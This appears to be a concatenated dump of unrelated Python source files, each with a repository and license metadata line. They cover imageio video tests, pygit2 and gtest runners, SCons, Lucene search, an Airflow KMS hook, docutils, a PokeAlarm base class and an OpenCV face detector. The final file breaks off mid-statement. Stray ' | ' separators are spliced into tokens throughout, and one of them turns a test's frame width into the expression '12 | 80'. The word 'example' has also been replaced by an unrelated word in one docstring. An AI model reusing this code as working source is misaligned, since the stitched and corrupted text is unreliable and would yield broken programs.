#assert mean(im) > 100 and mean(im) < 115 KNOWN FAIL
# We can rewind
reader.get_data(0)
# But not seek
with raises(IndexError):
reader.get_data(4)
def test_reader_more():
need_internet()
fname1 = get_remote_file('images/cockatoo.mp4')
fname3 = fname1[:-4] + '.stub.mp4'
# Get meta data
R = imageio.read(fname1, 'avbin', loop=True)
meta = R.get_meta_data()
assert isinstance(meta, dict)
assert 'fps' in meta
R.close()
# Read all frames and test length
R = imageio.read(get_remote_file('images/realshort.mp4'), 'avbin')
count = 0
while True:
try:
R.get_next_data()
except IndexError:
break
else:
count += 1
assert count == len(R)
assert count in (35, 36) # allow one frame off size that we know
# Test index error -1
raises(IndexError, R.get_data, -1)
# Test loop
R = imageio.read(get_remote_file('images/realshort.mp4'), 'avbin', loop=1)
im1 = R.get_next_data()
for i in range(1, len(R)):
R.get_next_data()
im2 = R.get_next_data()
im3 = R.get_data(0)
assert (im1 == im2).all()
assert (im1 == im3).all()
R.close()
# Test size when skipping empty frames, are there *any* valid frames?
# todo: use mimread once 1) len(R) == inf, or 2) len(R) is correct
R = imageio.read(get_remote_file('images/realshort.mp4'),
'avbin', skipempty=True)
ims = []
with R:
try:
while True:
ims.append(R.get_next_data())
except IndexError:
pass
assert len(ims) > 20 # todo: should be 35/36 but with skipempty ...
# Read invalid
open(fname3, 'wb')
raises(IOError, imageio.read, fname3, 'avbin')
def test_read_format():
need_internet()
# Set videofomat
# Also set skipempty, so we can test mean
reader = imageio.read(get_remote_file('images/cockatoo.mp4'), 'avbin',
videoformat='mp4', skipempty=True)
for i in range(10):
im = reader.get_next_data()
assert im.shape == (720, 12 | 80, 3)
assert mean(im) > 100 and mean(im) < 115
def test_stream():
need_internet()
with raises(IOError):
imageio.read | (get_remote_file('images/cockatoo.mp4'), 'avbin', stream=5)
def test_invalidfile():
need_internet()
filename = test_dir+'/empty.mp4'
with open(filename, 'w'):
pass
with raises(IOError):
imageio.read(filename, 'avbin')
# Check AVbinResult
imageio.plugins.avbin.AVbinResult(imageio.plugins.avbin.AVBIN_RESULT_OK)
for i in (2, 3, 4):
with raises(RuntimeError):
imageio.plugins.avbin.AVbinResult(i)
def show_in_mpl():
reader = imageio.read('cockatoo.mp4', 'avbin')
for i in range(10):
reader.get_next_data()
import pylab
pylab.ion()
pylab.show(reader.get_next_data())
def show_in_visvis():
reader = imageio.read('cockatoo.mp4', 'avbin')
#reader = imageio.read('<video0>')
import visvis as vv
im = reader.get_next_data()
f = vv.clf()
f.title = reader.format.name
t = vv.imshow(im, clim=(0, 255))
while not f._destroyed:
t.SetData(reader.get_next_data())
vv.processEvents()
run_tests_if_main()
|
Techcable/pygit2 | test/test_treebuilder.py | Python | gpl-2.0 | 2,526 | 0.001188 | # -*- coding: utf-8 -*-
#
# Copyright 2010-2014 The pygit2 contributors
#
# This file is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2,
# as published by the Free Software Foundation.
#
# In addition to the permissions in the GNU General Public License,
# the authors give you unlimited permission to link the compiled
# version of this file into combinations with other programs,
# and to distribute those combinations without any restriction
# coming from the use of this file. (The General Public License
# restrictions do apply in other respects; for example, they cover
# modification of the file, and distribution when not linked into
# a combined executable.)
#
# This file is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; see the file COPYING. If not, write to
# the Free Software Foundation, 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301, USA.
"""Tests for Index files."""
from __future__ import absolute_import
from __future__ import unicode_literals
import unittest
from . import utils
TREE_SHA = '967fce8df97cc71722d3c2a5930ef3e6f1d27b12'
class TreeBuilderTest(utils.BareRepoTestCase):
def test_new_empty_treebuilder(self):
self.repo.TreeBuilder()
def test_noop_treebuilder(self):
tree = self.repo[TREE_SHA]
| bld = self.repo.TreeBuilder(TREE_SHA)
result = bld.write()
self.assertEqual(len(bld), len(tree))
self.assertEqual(tree.id, result)
def test_noop_treebuild | er_from_tree(self):
tree = self.repo[TREE_SHA]
bld = self.repo.TreeBuilder(tree)
result = bld.write()
self.assertEqual(len(bld), len(tree))
self.assertEqual(tree.id, result)
def test_rebuild_treebuilder(self):
tree = self.repo[TREE_SHA]
bld = self.repo.TreeBuilder()
for entry in tree:
name = entry.name
self.assertTrue(bld.get(name) is None)
bld.insert(name, entry.hex, entry.filemode)
self.assertEqual(bld.get(name).id, entry.id)
result = bld.write()
self.assertEqual(len(bld), len(tree))
self.assertEqual(tree.id, result)
if __name__ == '__main__':
unittest.main()
|
dezelin/scons | scons-local/SCons/Tool/CVS.py | Python | mit | 2,859 | 0.007345 | """SCons.Tool.CVS.py
Tool-specific initialization for CVS.
There normally shouldn't be any need to import this module directl | y.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), | to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__revision__ = "src/engine/SCons/Tool/CVS.py 2014/07/05 09:42:21 garyo"
import SCons.Action
import SCons.Builder
import SCons.Util
def generate(env):
"""Add a Builder factory function and construction variables for
CVS to an Environment."""
def CVSFactory(repos, module='', env=env):
""" """
import SCons.Warnings as W
W.warn(W.DeprecatedSourceCodeWarning, """The CVS() factory is deprecated and there is no replacement.""")
# fail if repos is not an absolute path name?
if module != '':
# Don't use os.path.join() because the name we fetch might
# be across a network and must use POSIX slashes as separators.
module = module + '/'
env['CVSCOM'] = '$CVS $CVSFLAGS co $CVSCOFLAGS -d ${TARGET.dir} $CVSMODULE${TARGET.posix}'
act = SCons.Action.Action('$CVSCOM', '$CVSCOMSTR')
return SCons.Builder.Builder(action = act,
env = env,
CVSREPOSITORY = repos,
CVSMODULE = module)
#setattr(env, 'CVS', CVSFactory)
env.CVS = CVSFactory
env['CVS'] = 'cvs'
env['CVSFLAGS'] = SCons.Util.CLVar('-d $CVSREPOSITORY')
env['CVSCOFLAGS'] = SCons.Util.CLVar('')
env['CVSCOM'] = '$CVS $CVSFLAGS co $CVSCOFLAGS ${TARGET.posix}'
def exists(env):
return env.Detect('cvs')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
lavizhao/keyword | lucene/mult_search.py | Python | apache-2.0 | 2,456 | 0.015391 | #coding: utf-8
import csv
import threading
import lucene
from lucene import getVMEnv
print "预处理"
INDEX_DIR = '../index/'
nt = 100000
WRITE_DIR = "../data/mult/"
lucene.initVM()
directory = lucene.SimpleFSDirectory(lucene.File(INDEX_DIR))
analyzer = lucene.StandardAnalyzer(lucene.Version.LUCENE_CURRENT)
class sub_thread(threading.Thread):
"""
"""
def __init__(self, cont,lab,i):
"""
Arguments:
- `train`:
"""
threading.Thread.__init__(self)
self.content = cont
self.label = lab
self.i = i
print "len label",len(self.label)
def run(self):
owf = "%sresult%s.csv"%(WRITE_DIR,self.i)
print owf
t = open(owf,"w")
getVMEnv().attachCurrentThread()
searcher = lucene.IndexSearcher(directory,True)
a = 0
for line in self.content:
query = lucene.QueryParser(lucene.Version.LUCENE_CURRENT,
'content',analyzer).parse(line)
results = searcher.search(query,None,1)
score_docs = results.scoreDocs
b = 0
for score_doc in score_docs:
doc = searcher.doc(score_doc.doc)
b += 1
result = doc['tag']
t.write("%s,\"%s\"\n"%(self.label[a],result.strip()))
a += 1
if a % 10 == 0:
print "线程%s 完成%s,百分之%s已经完成"%(self.i,a,1.0*a/len(self.content))
def div(n,length):
"""
"""
result = []
for i in range(length+1):
if i % n == 0 or i == length:
result.append(i)
return result
def main():
"""
"""
print "读文件"
f = open("../data/test.csv")
reader = csv.reader(f)
content = []
for row in reader:
content.append(row[0]+" "+row[1])
print "测试数据个数",len(content)
turn = div(nt,len(content))
print turn
f.close()
print "读标签"
g = open("../data/label.txt")
| label = g.readlines()
label = [word.strip() for word in label]
label = label[1:]
for i in range(len(turn)-1):
sub_cont = content[turn[i] : turn[i+1] ]
sub_label = label[turn[i] : turn[i+1]][:]
mthread = sub_thread(sub_cont,sub_label,i)
mthread.start()
if __name__ == '__main__':
| print "hello world"
main()
|
silburt/rebound2 | examples/planetesimals2/movie/body_movie_output.py | Python | gpl-3.0 | 2,192 | 0.015055 | #This macro outputs 3D plots of the x,y,z co-ordinates of the particles. Main movie script
import sys
import matplotlib.pyplot as plt
import numpy as np
import glob
import math
pi = math.pi
from mpl_toolkits.mplot3d import Axes3D
import re
from subprocess import call
def natural_key(string_):
return [int(s) if s.isdigit() else s for s in re.split(r'(\d+)', string_)]
def get_color(id,N_massive):
color = 'black'
if id == 0:
color = 'yellow'
elif id <= N_massive:
color = 'red'
return color
N_massive = int(raw_input("Number of massive bodies (including sun): ")) - 1
dir = 'movie_output/'
files = glob.glob(dir+'hybridbody*.txt')
files = sorted(files, key=natural_key)
N_bodies = len(files) #number of files we're dealing with
#read in data for each body
data = []
try:
for f in files:
ff = | open(f, 'r')
lines = ff.readlines()
data.append(lines)
except:
print 'couldnt open', f, 'exiting'
exit(0)
n_it = len(data[0]) #calc num of lines
limit = 1 #size limits for plots = (x,y,z/2)
|
print 'deleting any existing .png images in output_movie folder'
call("rm output_movie/*.png",shell=True)
collision = np.zeros(N_bodies)
for iteration in xrange(0,n_it):
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
for i in xrange(0,N_bodies):
try:
line = data[i][iteration].split(",")
color = get_color(int(line[1]),N_massive)
ax.scatter(float(line[2]),float(line[3]),float(line[4]),c=color, lw=0)
except:
if collision[i] == 0:
print 'particle',i,' had a collision'
collision[i] = 1
#plotting details - make it all look pwetty.
ax.set_xlim([-limit,limit])
ax.set_ylim([-limit,limit])
ax.set_zlim([-limit/4,limit/4])
ax.view_init(elev = 90, azim=100) #both are in degrees. elev = 0 or 90 is what you want
output = 't='+line[0]
ax.set_title(output)
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
plt.savefig('movie_output/movie_output'+str(iteration)+'.png')
print 'completed iteration '+str(iteration + 1)+' of '+str(n_it)
|
jboeuf/grpc | tools/run_tests/python_utils/antagonist.py | Python | apache-2.0 | 688 | 0 | #!/usr/bin/env python |
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
| # See the License for the specific language governing permissions and
# limitations under the License.
"""This is used by run_tests.py to create cpu load on a machine"""
while True:
pass
|
nithyanandan/general | astroutils/__init__.py | Python | mit | 473 | 0.016913 | import os as _os
__version__='2.0.1'
__description__='General Purpose Radio Astronomy and Data Analysis Utilities'
__author__='Nithyanandan Thyagarajan'
__authoremail__='nithyanandan.t@gmail.com'
__maintainer__='Nithyanandan Thyagarajan'
__maintaineremail__='nithyanandan.t@gmail.com'
| __url__='http://github.com/nithyanandan/general'
with open(_os.path.dirname(_os.path.abspath(__file__))+'/githash.txt', 'r') as _githash_file:
__githash__ = | _githash_file.readline()
|
andyxhadji/incubator-airflow | airflow/contrib/hooks/gcp_kms_hook.py | Python | apache-2.0 | 4,060 | 0.001478 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import base64
from airflow.contrib.hooks.gcp_api_base_hook import GoogleCloudBaseHook
from apiclient.discovery import build
def _b64encode(s):
""" Base 64 encodes a bytes object to a string """
return base64.b64encode(s).decode('ascii')
def _b64decode(s):
""" Base 64 decodes a string to bytes. """
return base64.b64decode(s.encode('utf-8'))
class GoogleCloudKMSHook(GoogleCloudBaseHook):
"""
Interact with Google Cloud KMS. This hook uses the Google C | loud Platform
connection.
"""
def | __init__(self, gcp_conn_id='google_cloud_default', delegate_to=None):
super(GoogleCloudKMSHook, self).__init__(gcp_conn_id, delegate_to=delegate_to)
def get_conn(self):
"""
Returns a KMS service object.
:rtype: apiclient.discovery.Resource
"""
http_authorized = self._authorize()
return build(
'cloudkms', 'v1', http=http_authorized, cache_discovery=False)
def encrypt(self, key_name, plaintext, authenticated_data=None):
"""
Encrypts a plaintext message using Google Cloud KMS.
:param key_name: The Resource Name for the key (or key version)
to be used for encyption. Of the form
``projects/*/locations/*/keyRings/*/cryptoKeys/**``
:type key_name: str
:param plaintext: The message to be encrypted.
:type plaintext: bytes
:param authenticated_data: Optional additional authenticated data that
must also be provided to decrypt the message.
:type authenticated_data: bytes
:return: The base 64 encoded ciphertext of the original message.
:rtype: str
"""
keys = self.get_conn().projects().locations().keyRings().cryptoKeys()
body = {'plaintext': _b64encode(plaintext)}
if authenticated_data:
body['additionalAuthenticatedData'] = _b64encode(authenticated_data)
request = keys.encrypt(name=key_name, body=body)
response = request.execute()
ciphertext = response['ciphertext']
return ciphertext
def decrypt(self, key_name, ciphertext, authenticated_data=None):
"""
Decrypts a ciphertext message using Google Cloud KMS.
:param key_name: The Resource Name for the key to be used for decyption.
Of the form ``projects/*/locations/*/keyRings/*/cryptoKeys/**``
:type key_name: str
:param ciphertext: The message to be decrypted.
:type ciphertext: str
:param authenticated_data: Any additional authenticated data that was
provided when encrypting the message.
:type authenticated_data: bytes
:return: The original message.
:rtype: bytes
"""
keys = self.get_conn().projects().locations().keyRings().cryptoKeys()
body = {'ciphertext': ciphertext}
if authenticated_data:
body['additionalAuthenticatedData'] = _b64encode(authenticated_data)
request = keys.decrypt(name=key_name, body=body)
response = request.execute()
plaintext = _b64decode(response['plaintext'])
return plaintext
|
akiokio/centralfitestoque | src/.pycharm_helpers/docutils/transforms/components.py | Python | bsd-2-clause | 2,003 | 0.000999 | # $Id: components.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
Docutils component-related transforms.
"""
__docformat__ = 'reStructure | dText'
import sys
import os
import re
import time
from docutils import nodes, utils
from docutils import ApplicationError, DataError
from docutils.transforms import Transform, | TransformError
class Filter(Transform):
"""
Include or exclude elements which depend on a specific Docutils component.
For use with `nodes.pending` elements. A "pending" element's dictionary
attribute ``details`` must contain the keys "component" and "format". The
value of ``details['component']`` must match the type name of the
component the elements depend on (e.g. "writer"). The value of
``details['format']`` is the name of a specific format or context of that
component (e.g. "html"). If the matching Docutils component supports that
format or context, the "pending" element is replaced by the contents of
``details['nodes']`` (a list of nodes); otherwise, the "pending" element
is removed.
For centralfitestoque, the reStructuredText "meta" directive creates a "pending"
element containing a "meta" element (in ``pending.details['nodes']``).
Only writers (``pending.details['component'] == 'writer'``) supporting the
"html" format (``pending.details['format'] == 'html'``) will include the
"meta" element; it will be deleted from the output of all other writers.
"""
default_priority = 780
def apply(self):
pending = self.startnode
component_type = pending.details['component'] # 'reader' or 'writer'
format = pending.details['format']
component = self.document.transformer.components[component_type]
if component.supports(format):
pending.replace_self(pending.details['nodes'])
else:
pending.parent.remove(pending)
|
RevansChen/online-judge | Codewars/7kyu/remove-anchor-from-url/Python/solution1.py | Python | mit | 102 | 0.019608 | # Python - 3.6.0
remove_url_anchor = lambda url: url[:(('#' in | url) and url.index('#') | ) or len(url)]
|
iw3hxn/LibrERP | export_customers/__openerp__.py | Python | agpl-3.0 | 2,043 | 0.000979 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2014 Didotech SRL (info at didotech.com)
# All Rights Reserved.
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
######## | ######################################################################
{
"name": "Export Customers - Exporting customer's data in .csv file for italian fiscal program.",
'version': '2.0.1.0',
'category': 'Generic Modules/Sales customers',
"descripti | on": """Exporting customer's data in .csv file """,
"author": "Didotech SRL",
'website': 'http://www.didotech.com',
"depends": [
"base",
"base_partner_ref",
"sale",
"account",
#"l10n_it",
"l10n_it_base",
"l10n_it_account"
],
"init_xml": [],
"update_xml": [
"security/security.xml",
"export_customers.xml"
],
"demo_xml": [],
"installable": True,
"active": False,
}
|
joberembt/PokeAlarm | alarms/alarm.py | Python | gpl-3.0 | 1,134 | 0.054674 | #Setup Logging
import logging
log = logging.getLogger(__name__)
#Python modules
#Local modules
#External modules
class Alarm(object):
_defaults = {
"pokemon":{},
"lures":{},
"gyms":{}
}
#Gather settings and create alarm
def __init__(self):
raise NotImplementedError("This is an abstract method.")
#(Re)establishes Service connection
def connect():
raise NotImplementedError("This is an abstract method.")
#Set the appropriate settings for each alert
def set_alert(self, settings):
raise NotImplementedError("This is an abstract method.")
#Send Alert to the Service
def send_alert(self, alert_settings, info):
raise NotImplementedError("This is an abstract method.")
#Trigger an alert based on Pokemon info
def pokemon_alert(self, pokemon_info):
raise NotImplementedError("This is an abstract method.")
#Trigger an alert based on PokeLure info
def pokes | top_alert | (self, pokelure_info):
raise NotImplementedError("This is an abstract method.")
#Trigger an alert based on PokeGym info
def gym_alert(self, pokegym_info):
raise NotImplementedError("This is an abstract method.")
|
ddemidov/ev3dev-lang-python-1 | spec_version.py | Python | mit | 108 | 0 | # ~autogen spec_ver | sion
spec_version = "spec: 0.9.3-pre-r2, kernel: v3.16.7-ckt16-7-ev3dev-ev3" |
# ~autogen
|
plxaye/chromium | src/build/android/pylib/gtest/test_runner.py | Python | apache-2.0 | 15,830 | 0.004296 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import glob
import logging
import os
from pylib import android_commands
from pylib import constants
from pylib import perf_tests_helper
from pylib.android_commands import errors
from pylib.base import base_test_result
from pylib.base import base_test_runner
from pylib.utils import run_tests_helper
import test_package_apk
import test_package_executable
def _GetDataFilesForTestSuite(test_suite_basename):
"""Returns a list of data files/dirs needed by the test suite.
Args:
test_suite_basename: The test suite basename for which to return file paths.
Returns:
A list of test file and directory paths.
"""
# Ideally, we'd just push all test data. However, it has >100MB, and a lot
# of the files are not relevant (some are used for browser_tests, others for
# features not supported, etc..).
if test_suite_basename == 'base_unittests':
return [
'base/test/data/',
]
elif test_suite_basename == 'unit_tests':
test_files = [
'base/test/data/',
'chrome/test/data/download-test1.lib',
'chrome/test/data/extensions/bad_magic.crx',
'chrome/test/data/extensions/good.crx',
'chrome/test/data/extensions/icon1.png',
'chrome/test/data/extensions/icon2.png',
'chrome/test/data/extensions/icon3.png',
'chrome/test/data/extensions/allow_silent_upgrade/',
'chrome/test/data/extensions/app/',
'chrome/test/data/extensions/bad/',
'chrome/test/data/extensions/effective_host_permissions/',
'chrome/test/data/extensions/empty_manifest/',
'chrome/test/data/extensions/good/Extensions/',
'chrome/test/data/extensions/manifest_tests/',
'chrome/test/data/extensions/page_action/',
'chrome/test/data/extensions/permissions/',
'chrome/test/data/extensions/script_and_capture/',
'chrome/test/data/extensions/unpacker/',
'chrome/test/data/bookmarks/',
'chrome/test/data/components/',
'chrome/test/data/extensions/json_schema_test.js',
'chrome/test/data/History/',
'chrome/test/data/json_schema_validator/',
'chrome/test/data/pref_service/',
'chrome/test/data/simple_open_search.xml',
'chrome/test/data/top_sites/',
'chrome/test/data/web_app_info/',
'chrome/test/data/web_database',
'chrome/test/data/webui/',
'chrome/third_party/mock4js/',
'net/data/ssl/certificates',
'third_party/accessibility-developer-tools/gen/axs_testing.js',
]
# The following are spell check data. Now only list the data under
# third_party/hunspell_dictionaries which are used by unit tests.
old_cwd = os.getcwd()
os.chdir(constants.CHROME_DIR)
test_files += glob.glob('third_party/hunspell_dictionaries/*.bdic')
os.chdir(old_cwd)
return test_files
elif test_suite_basename == 'components_unittests':
return [
'components/test/data/zip',
]
elif test_suite_basename == 'media_unittests':
return [
'media/test/data',
]
elif test_suite_basename == 'net_unittests':
return [
'chrome/test/data/animate1.gif',
'chrome/test/data/simple.html',
'net/data/cache_tests',
'net/data/filter_unittests',
'net/data/ftp',
'net/data/proxy_resolver_v8_tracing_unittest',
'net/data/proxy_resolver_v8_unittest',
'net/data/proxy_script_fetcher_unittest',
'net/data/ssl/certificates',
'net/data/url_request_unittest/',
]
elif test_suite_basename == 'ui_tests':
return [
'chrome/test/data/dromaeo',
'chrome/test/data/json2.js',
'chrome/test/data/sunspider',
]
elif test_suite_basename == 'ui_unittests':
return [
'ui/base/test/data/data_pack_unittest/truncated-header.pak',
]
elif test_suite_basename == 'content_unittests':
return [
'content/browser/gpu/software_rendering_list.json',
'content/test/data/gpu/webgl_conformance_test_expectations.txt',
'net/data/ssl/certificates/',
'third_party/hyphen/hyph_en_US.dic',
'webkit/data/dom_storage/webcore_test_database.localstorage',
]
elif test_suite_basename == 'cc_perftests':
return [
'cc/test/data',
]
elif test_suite_basename == 'perf_tests':
return [
'base/test/data',
]
elif test_suite_basename == 'content_browsertests':
return [
'content/test/data/content-disposition-inline.html',
'content/test/data/title1.html',
'content/test/data/post_message2.html',
'content/test/data/content-sniffer-test0.html.mock-http-headers',
'content/test/data/content-sniffer-test1.html.mock-http-headers',
'content/test/data/speech',
'content/test/data/page404.html.mock-http-headers',
'content/test/data/content-sniffer-test3.html',
'content/test/data/post_message.html',
'content/test/data/remove_frame_on_unload.html',
'content/test/data/cross-origin-redirect-blocked.html',
'content/test/data/prerender',
'content/test/data/device_orientation',
'content/test/data/content-disposition-empty.html',
'content/test/data/workers',
'content/test/data/content-sniffer-test3.html.mock-http-headers',
'content/test/data/content-sniffer-test0.html',
'content/test/data/browser_plugin_title_change.html',
'content/test/data/android',
'content/test/data/page404.html',
'content/test/data/dynamic2.html',
'content/test/data/browser_plugin_embedder.html',
'content/test/data/indexeddb',
'content/test/data/content-disposition-inline.html.mock-http-headers',
'content/test/data/nosniff-test.html',
'content/test/data/title3.html',
'content/test/data/browser_plugin_post_message_guest.html',
'content/test/data/content-disposition-empty.html.mock-http-headers',
'content/test/data/session_history',
'content/test/data/browser_plugin_naming_guest.html',
'content/test/data/overscroll_navigation.html',
'content/test/data/simple_database.html',
'content/test/data/gtk_key_bindings_test_gtkrc',
'content/test/data/browser_plugin_embedder_guest_unresponsive.html',
'content/test/data/sync_xmlhttprequest.html',
'content/test/data/content-sniffer-test3-frame.txt.mock-http-headers',
'content/test/data/frame_tree',
'content/test/data/browser_plugin_naming_embedder.html',
'content/test/data/content-sniffer-test2.html.mock-http-headers',
'content/test/data/sync_xmlhttprequest_disallowed.html',
'content/test/data/rwh_simple.html',
'content/test/data/title2.html',
'content/test/data/webkit',
'content/test/data/content-sniffer-test1.html',
'content/test/data/download',
'content/test/data/rwhv_compositing_static.html',
'content/test/data/content-sniffer-test2.html',
'content/test/data/simple_page.html',
'content/test/data/google.mht',
'content/test/data/site_per_process_main.html',
'content/test/data/gpu',
'content/test/data/onunload_cookie.html',
'content/test/data/textinput',
'content/test/data/navigate_opener.html',
'content/test/data/dom_storage',
| 'content/test/data/sync_xmlhttprequest_during_unload.html',
'content/test/data/browser_plugin_dragging.html',
'content/test/data/fileapi',
'content/test/data/npapi',
'content/test/data/nosniff-test.html.mock-http-headers',
'content/test/data/accessibility',
'content/test/data/dynamic1.html',
'content/test/data/browser_plugin_focus_chi | ld.html',
'content/test/data/rwhv_compositing_animation.html',
'content/test/data/click-noreferrer-links.html',
'content/test/data/browser_plugin_focus.html',
'content/test/data/media',
]
return []
def _GetOpt |
ruscito/pycomm | pycomm/ab_comm/__init__.py | Python | mit | 39 | 0 | __author__ = 'ago | stino'
import logg | ing
|
idf/FaceReader | facerec_py/facedet/detector.py | Python | mit | 5,760 | 0.003125 | import sys
import os
import cv2
import numpy as np
class Detector:
def detect(self, src):
raise NotImplementedError("Every Detector must implement the detect method.")
class SkinDetector(Detector):
"""
Implements common color thresholding rules for the RGB, YCrCb and HSV color
space. The values are taken from a paper, which I can't find right now, so
be careful with this detector.
"""
def _R1(self, BGR):
# channels
B = BGR[:, :, 0]
G = BGR[:, :, 1]
R = BGR[:, :, 2]
e1 = (R > 95) & (G > 40) & (B > 20) & (
(np.maximum(R, np.maximum(G, B)) - np.minimum(R, np.minimum(G, B))) > 15) & (np.abs(R - G) > 15) & (
R > G) & (
R > B)
e2 = (R > 220) & (G > 210) & (B > 170) & (abs(R - G) <= 15) & (R > B) & (G > B)
return (e1 | e2)
def _R2(self, YCrCb):
Y = YCrCb[:, :, 0]
Cr = YCrCb[:, :, 1]
Cb = YCrCb[:, :, 2]
e1 = Cr <= (1.5862 * Cb + 20)
e2 = Cr >= (0.3448 * Cb + 76.2069)
e3 = Cr >= (-4.5652 * Cb + 234.5652)
e4 = Cr <= (-1.15 * Cb + 301.75)
e5 = Cr <= (-2.2857 * Cb + 432.85)
return e1 & e2 & e3 & e4 & e5
def _R3(self, HSV):
H = HSV[:, :, 0]
S = HSV[:, :, 1]
V = HSV[:, :, 2]
return ((H < 25) | (H > 230))
def detect(self, src):
if np.ndim(src) < 3:
return np.ones(src.shape, dtype=np.uint8)
if src.dtype != np.uint8:
return np.ones(src.shape, dtype=np.uint8)
srcYCrCb = cv2.cvtColor(src, cv2.COLOR_BGR2YCR_CB)
srcHSV = cv2.cvtColor(src, cv2.COLOR_BGR2HSV)
skinPixels = self._R1(src) & self._R2(srcYCrCb) & | self._R3(srcHSV)
return np.asarray(skinPixels, dtype=np.uint8)
class CascadedDetector(Detector):
"""
Uses | the OpenCV cascades to perform the detection. Returns the Regions of Interest, where
the detector assumes a face. You probably have to play around with the scaleFactor,
minNeighbors and minSize parameters to get good results for your use case. From my
personal experience, all I can say is: there's no parameter combination which *just
works*.
"""
def __init__(self, cascade_fn="./cascades/haarcascade_frontalface_alt2.xml", scaleFactor=1.2, minNeighbors=5,
minSize=(30, 30)):
if not os.path.exists(cascade_fn):
raise IOError("No valid cascade found for path=%s." % cascade_fn)
self.cascade = cv2.CascadeClassifier(cascade_fn)
self.scaleFactor = scaleFactor
self.minNeighbors = minNeighbors
self.minSize = minSize
def detect(self, src):
if np.ndim(src) == 3:
src = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)
src = cv2.equalizeHist(src)
rects = self.cascade.detectMultiScale(src, scaleFactor=self.scaleFactor, minNeighbors=self.minNeighbors,
minSize=self.minSize)
if len(rects) == 0:
return []
rects[:, 2:] += rects[:, :2]
return rects
class SkinFaceDetector(Detector):
"""
Uses the SkinDetector to accept only faces over a given skin color tone threshold (ignored for
grayscale images). Be careful with skin color tone thresholding, as it won't work in uncontrolled
scenarios (without preprocessing)!
"""
def __init__(self, threshold=0.3, cascade_fn="./cascades/haarcascade_frontalface_alt2.xml", scaleFactor=1.2,
minNeighbors=5, minSize=(30, 30)):
self.faceDetector = CascadedDetector(cascade_fn=cascade_fn, scaleFactor=scaleFactor, minNeighbors=minNeighbors,
minSize=minSize)
self.skinDetector = SkinDetector()
self.threshold = threshold
def detect(self, src):
rects = []
for i, r in enumerate(self.faceDetector.detect(src)):
x0, y0, x1, y1 = r
face = src[y0:y1, x0:x1]
skinPixels = self.skinDetector.detect(face)
skinPercentage = float(np.sum(skinPixels)) / skinPixels.size
print skinPercentage
if skinPercentage > self.threshold:
rects.append(r)
return rects
if __name__ == "__main__":
# script parameters
if len(sys.argv) < 2:
raise Exception("No image given.")
inFileName = sys.argv[1]
outFileName = None
if len(sys.argv) > 2:
outFileName = sys.argv[2]
if outFileName == inFileName:
outFileName = None
# detection begins here
img = np.array(cv2.imread(inFileName), dtype=np.uint8)
imgOut = img.copy()
# set up detectors
# detector = SkinFaceDetector(threshold=0.3, cascade_fn="/home/philipp/projects/opencv2/OpenCV-2.3.1/data/haarcascades/haarcascade_frontalface_alt2.xml")
detector = CascadedDetector(
